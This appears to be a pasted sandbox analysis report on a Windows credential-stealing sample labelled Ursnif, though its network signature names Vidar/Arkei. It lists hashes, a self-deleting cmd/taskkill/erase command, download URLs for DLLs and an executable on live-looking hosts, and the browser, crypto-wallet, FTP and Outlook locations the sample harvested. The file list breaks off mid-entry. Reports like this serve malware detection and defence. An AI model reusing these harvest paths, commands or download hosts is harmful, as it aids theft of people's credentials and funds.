SHARE
TWEET

Ursnif_6cc70fb7b014fe253989338d5008381d_exe_2019-07-22_19_30.txt

paladin316 Jul 22nd, 2019 71 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. * MalFamily: "Ursnif"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Ursnif_6cc70fb7b014fe253989338d5008381d.exe"
  7. * File Size: 664576
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "83502653aa68b492d6382416ecc27a7350be45968211f117ab2a860fb5fe093d"
  10. * MD5: "6cc70fb7b014fe253989338d5008381d"
  11. * SHA1: "eaab87820e5da8b64eb2d2bc2e2bbbac3a43130f"
  12. * SHA512: "e4dbdaaac28eeb15ea6cbd3554090f2883a4a905681269ac72380480d9cc51dc2f079ba7fc37bfe8534d94ffd0629e8bfbcc6c45980ed0300aae9369ad72f01a"
  13. * CRC32: "2349236C"
  14. * SSDEEP: "12288:EGolQnTahriSgWOGi80bfjPpBGxP7+BubZa3BR/mLV09J569buuKa1:EGR+hriSgUi80DOxVa3mLuJ569Cub1"
  15.  
  16. * Process Execution:
  17.     "Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
  18.     "cmd.exe",
  19.     "taskkill.exe",
  20.     "services.exe",
  21.     "svchost.exe",
  22.     "WmiPrvSE.exe",
  23.     "taskhost.exe",
  24.     "sc.exe",
  25.     "svchost.exe",
  26.     "svchost.exe",
  27.     "WerFault.exe",
  28.     "wermgr.exe"
  29.  
  30.  
  31. * Executed Commands:
  32.     "C:\\ProgramData\\JCXFRDIE2I.exe ",
  33.     "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe & exit",
  34.     "C:\\Windows\\system32\\lsass.exe",
  35.     "taskhost.exe $(Arg0)",
  36.     "C:\\Windows\\system32\\sc.exe start w32time task_started",
  37.     "C:\\Windows\\system32\\svchost.exe -k LocalService",
  38.     "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  39.     "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  40.     "taskkill  /im Ursnif_6cc70fb7b014fe253989338d5008381d.exe /f",
  41.     "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  42.     "C:\\Windows\\system32\\WerFault.exe -u -p 2776 -s 288",
  43.     "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\""
  44.  
  45.  
  46. * Signatures Detected:
  47.    
  48.         "Description": "At least one process apparently crashed during execution",
  49.         "Details":
  50.    
  51.    
  52.         "Description": "Creates RWX memory",
  53.         "Details":
  54.    
  55.    
  56.         "Description": "A process attempted to delay the analysis task.",
  57.         "Details":
  58.            
  59.                 "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
  60.            
  61.        
  62.    
  63.    
  64.         "Description": "A process created a hidden window",
  65.         "Details":
  66.            
  67.                 "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\ProgramData\\JCXFRDIE2I.exe"
  68.            
  69.            
  70.                 "Process": "Ursnif_6cc70fb7b014fe253989338d5008381d.exe -> C:\\Windows\\System32\\cmd.exe"
  71.            
  72.        
  73.    
  74.    
  75.         "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  76.         "Details":
  77.            
  78.                 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  79.            
  80.            
  81.                 "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  82.            
  83.            
  84.                 "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  85.            
  86.            
  87.                 "suspicious_request": "http://otnet.xyz/141"
  88.            
  89.            
  90.                 "suspicious_request": "http://otnet.xyz/freebl3.dll"
  91.            
  92.            
  93.                 "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  94.            
  95.            
  96.                 "suspicious_request": "http://otnet.xyz/mozglue.dll"
  97.            
  98.            
  99.                 "suspicious_request": "http://otnet.xyz/msvcp140.dll"
  100.            
  101.            
  102.                 "suspicious_request": "http://otnet.xyz/nss3.dll"
  103.            
  104.            
  105.                 "suspicious_request": "http://otnet.xyz/softokn3.dll"
  106.            
  107.            
  108.                 "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
  109.            
  110.            
  111.                 "suspicious_request": "http://ip-api.com/line/"
  112.            
  113.            
  114.                 "suspicious_request": "http://otnet.xyz/"
  115.            
  116.            
  117.                 "suspicious_request": "http://bookyeti.com/img/3001.exe"
  118.            
  119.        
  120.    
  121.    
  122.         "Description": "Performs some HTTP requests",
  123.         "Details":
  124.            
  125.                 "url": "http://otnet.xyz/141"
  126.            
  127.            
  128.                 "url": "http://otnet.xyz/freebl3.dll"
  129.            
  130.            
  131.                 "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  132.            
  133.            
  134.                 "url": "http://otnet.xyz/mozglue.dll"
  135.            
  136.            
  137.                 "url": "http://otnet.xyz/msvcp140.dll"
  138.            
  139.            
  140.                 "url": "http://otnet.xyz/nss3.dll"
  141.            
  142.            
  143.                 "url": "http://otnet.xyz/softokn3.dll"
  144.            
  145.            
  146.                 "url": "http://otnet.xyz/vcruntime140.dll"
  147.            
  148.            
  149.                 "url": "http://ip-api.com/line/"
  150.            
  151.            
  152.                 "url": "http://otnet.xyz/"
  153.            
  154.            
  155.                 "url": "http://bookyeti.com/img/3001.exe"
  156.            
  157.        
  158.    
  159.    
  160.         "Description": "Deletes its original binary from disk",
  161.         "Details":
  162.    
  163.    
  164.         "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  165.         "Details":
  166.            
  167.                 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13574119 times"
  168.            
  169.        
  170.    
  171.    
  172.         "Description": "Attempts to execute a binary from a dead or sinkholed URL",
  173.         "Details":
  174.            
  175.                 "dead_binary": "c:\\programdata\\jcxfrdie2i.exe"
  176.            
  177.        
  178.    
  179.    
  180.         "Description": "Steals private information from local Internet browsers",
  181.         "Details":
  182.            
  183.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  184.            
  185.            
  186.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt"
  187.            
  188.            
  189.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  190.            
  191.            
  192.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  193.            
  194.            
  195.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt"
  196.            
  197.            
  198.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  199.            
  200.            
  201.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt"
  202.            
  203.        
  204.    
  205.    
  206.         "Description": "Collects information about installed applications",
  207.         "Details":
  208.            
  209.                 "Program": "Google Update Helper"
  210.            
  211.            
  212.                 "Program": "Microsoft Excel MUI  2013"
  213.            
  214.            
  215.                 "Program": "Microsoft Outlook MUI  2013"
  216.            
  217.            
  218.            
  219.            
  220.                 "Program": "Google Chrome"
  221.            
  222.            
  223.                 "Program": "Adobe Flash Player 29 NPAPI"
  224.            
  225.            
  226.                 "Program": "Adobe Flash Player 29 ActiveX"
  227.            
  228.            
  229.                 "Program": "Microsoft DCF MUI  2013"
  230.            
  231.            
  232.                 "Program": "Microsoft Access MUI  2013"
  233.            
  234.            
  235.                 "Program": "Microsoft Office Proofing Tools 2013 - English"
  236.            
  237.            
  238.                 "Program": "Adobe Acrobat Reader DC"
  239.            
  240.            
  241.                 "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  242.            
  243.            
  244.                 "Program": "Microsoft Publisher MUI  2013"
  245.            
  246.            
  247.                 "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  248.            
  249.            
  250.                 "Program": "Microsoft Office Shared MUI  2013"
  251.            
  252.            
  253.                 "Program": "Microsoft Office OSM MUI  2013"
  254.            
  255.            
  256.                 "Program": "Microsoft InfoPath MUI  2013"
  257.            
  258.            
  259.                 "Program": "Microsoft Office Shared Setup Metadata MUI  2013"
  260.            
  261.            
  262.                 "Program": "Microsoft Word MUI  2013"
  263.            
  264.            
  265.                 "Program": "Microsoft Groove MUI  2013"
  266.            
  267.            
  268.            
  269.            
  270.                 "Program": "Microsoft Access Setup Metadata MUI  2013"
  271.            
  272.            
  273.                 "Program": "Microsoft Office OSM UX MUI  2013"
  274.            
  275.            
  276.                 "Program": "Java Auto Updater"
  277.            
  278.            
  279.                 "Program": "Microsoft PowerPoint MUI  2013"
  280.            
  281.            
  282.                 "Program": "Microsoft Office Professional Plus 2013"
  283.            
  284.            
  285.                 "Program": "Adobe Refresh Manager"
  286.            
  287.            
  288.                 "Program": "Microsoft Office Proofing  2013"
  289.            
  290.            
  291.                 "Program": "Microsoft Lync MUI  2013"
  292.            
  293.            
  294.            
  295.            
  296.                 "Program": "Microsoft OneNote MUI  2013"
  297.            
  298.        
  299.    
  300.    
  301.         "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  302.         "Details":
  303.    
  304.    
  305.         "Description": "Checks the system manufacturer, likely for anti-virtualization",
  306.         "Details":
  307.    
  308.    
  309.         "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  310.         "Details":
  311.            
  312.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  313.            
  314.            
  315.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  316.            
  317.            
  318.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b"
  319.            
  320.            
  321.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\*.*"
  322.            
  323.            
  324.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  325.            
  326.            
  327.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\*.*"
  328.            
  329.            
  330.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
  331.            
  332.            
  333.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\"
  334.            
  335.            
  336.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  337.            
  338.            
  339.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\*.*"
  340.            
  341.            
  342.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\"
  343.            
  344.            
  345.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  346.            
  347.            
  348.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\"
  349.            
  350.            
  351.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  352.            
  353.            
  354.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\*.*"
  355.            
  356.            
  357.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  358.            
  359.            
  360.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  361.            
  362.            
  363.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\"
  364.            
  365.            
  366.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\*.*"
  367.            
  368.            
  369.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  370.            
  371.            
  372.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\*.*"
  373.            
  374.            
  375.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  376.            
  377.            
  378.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  379.            
  380.            
  381.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\"
  382.            
  383.            
  384.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  385.            
  386.            
  387.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\*.*"
  388.            
  389.            
  390.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  391.            
  392.            
  393.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\"
  394.            
  395.            
  396.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\"
  397.            
  398.            
  399.                 "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  400.            
  401.            
  402.                 "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  403.            
  404.            
  405.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\*.*"
  406.            
  407.            
  408.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  409.            
  410.            
  411.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\*.*"
  412.            
  413.            
  414.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\"
  415.            
  416.            
  417.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  418.            
  419.            
  420.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  421.            
  422.            
  423.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\"
  424.            
  425.            
  426.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\*.*"
  427.            
  428.            
  429.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  430.            
  431.            
  432.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\*.*"
  433.            
  434.            
  435.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  436.            
  437.            
  438.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  439.            
  440.            
  441.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\"
  442.            
  443.            
  444.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\*.*"
  445.            
  446.            
  447.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\"
  448.            
  449.            
  450.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  451.            
  452.            
  453.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  454.            
  455.            
  456.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\*.*"
  457.            
  458.            
  459.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  460.            
  461.            
  462.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  463.            
  464.            
  465.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\"
  466.            
  467.            
  468.                 "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  469.            
  470.            
  471.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\"
  472.            
  473.            
  474.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\*.*"
  475.            
  476.            
  477.                 "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  478.            
  479.            
  480.                 "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  481.            
  482.            
  483.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\"
  484.            
  485.            
  486.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\*.*"
  487.            
  488.            
  489.                 "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  490.            
  491.            
  492.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  493.            
  494.            
  495.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\"
  496.            
  497.            
  498.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\*.*"
  499.            
  500.            
  501.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  502.            
  503.            
  504.                 "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  505.            
  506.            
  507.                 "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
  508.            
  509.            
  510.                 "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  511.            
  512.            
  513.                 "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  514.            
  515.            
  516.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\"
  517.            
  518.            
  519.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\*.*"
  520.            
  521.            
  522.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  523.            
  524.            
  525.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\*.*"
  526.            
  527.            
  528.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  529.            
  530.            
  531.                 "file": "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\"
  532.            
  533.        
  534.    
  535.    
  536.         "Description": "Harvests credentials from local FTP client softwares",
  537.         "Details":
  538.            
  539.                 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  540.            
  541.        
  542.    
  543.    
  544.         "Description": "Harvests information related to installed instant messenger clients",
  545.         "Details":
  546.            
  547.                 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  548.            
  549.        
  550.    
  551.    
  552.         "Description": "Harvests information related to installed mail clients",
  553.         "Details":
  554.            
  555.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  556.            
  557.            
  558.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  559.            
  560.            
  561.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  562.            
  563.            
  564.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  565.            
  566.            
  567.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  568.            
  569.            
  570.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  571.            
  572.            
  573.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  574.            
  575.        
  576.    
  577.    
  578.         "Description": "Collects information to fingerprint the system",
  579.         "Details":
  580.    
  581.    
  582.         "Description": "Created network traffic indicative of malicious activity",
  583.         "Details":
  584.            
  585.                 "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  586.            
  587.        
  588.    
  589.  
  590.  
  591. * Started Service:
  592.     "VaultSvc",
  593.     "WerSvc",
  594.     "W32Time"
  595.  
  596.  
  597. * Mutexes:
  598.     "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963",
  599.     "Local\\WERReportingForProcess2776",
  600.     "Global\\\\xe5\\x88\\x90\\xc2\\x90",
  601.     "Global\\\\xed\\x95\\xb02",
  602.     "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
  603.  
  604.  
  605. * Modified Files:
  606.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\passwords.txt",
  607.     "C:\\ProgramData\\freebl3.dll",
  608.     "C:\\ProgramData\\mozglue.dll",
  609.     "C:\\ProgramData\\msvcp140.dll",
  610.     "C:\\ProgramData\\nss3.dll",
  611.     "C:\\ProgramData\\softokn3.dll",
  612.     "C:\\ProgramData\\vcruntime140.dll",
  613.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\ld",
  614.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\historych",
  615.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\History\\Google Chrome_Default.txt",
  616.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Downloads\\Google Chrome_Default.txt",
  617.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\c",
  618.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Google Chrome_Default.txt",
  619.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\wd",
  620.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Autofill\\Google Chrome_Default.txt",
  621.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\CC\\Google Chrome_Default.txt",
  622.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Soft\\Authy\\\\xec\\x90\\xa0\\xcd\\xb2\\xe0\\xb8\\xa8\\xc7\\x8b\\xeb\\x86\\x88\\xc7\\xb2\\xe9\\x95\\xb0\\xc8\\x83",
  623.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\IE_Cookies.txt",
  624.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Cookies\\Edge_Cookies.txt",
  625.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\cookie_list.txt",
  626.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\outlook.txt",
  627.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\information.txt",
  628.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Files\\Default.zip",
  629.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x95\\x8b",
  630.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Ethereum\\",
  631.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Electrum\\",
  632.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectrumLTC\\\r",
  633.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Exodus\\",
  634.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\ElectronCash\\\r",
  635.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge\\",
  636.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash\\",
  637.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DashCore\\",
  638.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Litecoin\\",
  639.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Anoncoin\\",
  640.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\BBQCoin\\",
  641.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DevCoin\\",
  642.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\DigitalCoin\\",
  643.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FlorinCoin\\",
  644.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Franko\\",
  645.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\FreiCoin\\",
  646.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\GoldCoinGLD\\",
  647.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\InfiniteCoin\\",
  648.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IOCoin\\",
  649.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\IxCoin\\",
  650.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MegaCoin\\",
  651.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin\\",
  652.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin\\",
  653.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin\\",
  654.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin\\",
  655.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin\\",
  656.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\JAXX\\\r",
  657.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\screenshot.jpg",
  658.     "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
  659.     "C:\\ProgramData\\JCXFRDIE2I.exe",
  660.     "C:\\ProgramData\\JCXFRDIE2I.exe:Zone.Identifier",
  661.     "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  662.     "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  663.     "C:\\Windows\\sysnative\\LogFiles\\Scm\\16379d62-d2d1-45c7-a48c-f33b02ea0429",
  664.     "\\??\\PIPE\\lsarpc",
  665.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
  666.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
  667.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
  668.     "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
  669.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBC62.tmp.appcompat.txt",
  670.     "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\WERBFBE.tmp.WERInternalMetadata.xml",
